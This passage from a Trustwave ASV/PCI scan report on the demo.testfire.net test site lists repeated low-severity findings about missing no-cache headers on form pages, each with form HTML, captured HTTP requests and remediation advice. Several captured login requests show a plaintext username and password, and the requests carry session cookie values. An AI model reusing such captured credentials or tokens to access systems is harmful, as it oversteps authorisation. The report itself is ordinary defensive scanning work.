CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 529 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Request: GET http://demo.testfire.net:8080/feedback.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 530 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

194 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/doLogin


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117:8443/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 531 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

195 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 532 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://65.61.137.117:8443/ HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

196 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 533 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

197 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/doLogin


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 534 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: POST https://65.61.137.117/doLogin HTTP/1.1


Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

198 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/feedback.jsp


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 535 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Request: GET http://65.61.137.117/feedback.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 536 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

199 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/index.jsp?content=business.htm


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://65.61.137.117/index.jsp?content=business.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 537 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

200 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/doLogin


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net:8080/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 538 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1


Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

201 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/search.jsp?query=_WSETESTDAT


directives for pages having A
forms Port: tcp/8080

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 539 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

202 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/index.jsp


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 540 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://65.61.137.117:8080/index.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

203 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/login.jsp


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 541 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: GET http://65.61.137.117:8080/login.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 542 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

204 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/index.jsp?content=personal.ht


directives for pages having m
forms Port: tcp/8443

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://demo.testfire.net:8443/index.jsp?content=personal.htm
HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 543 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

205 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/search.jsp?query=_WSETESTDATA


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 544 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Request: GET
http://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

206 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/index.jsp?content=personal.htm


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp?content=personal.htm
No Caching Directives Found.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 545 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://demo.testfire.net/index.jsp?content=personal.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

207 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/index.jsp


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 546 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://demo.testfire.net/index.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

208 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/login.jsp


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 547 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: GET https://demo.testfire.net/login.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 548 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
response containing form.

209 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/feedback.jsp


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 549 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET http://65.61.137.117:8080/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

210 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 550 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="text" name="query" id="query" accesskey="S">
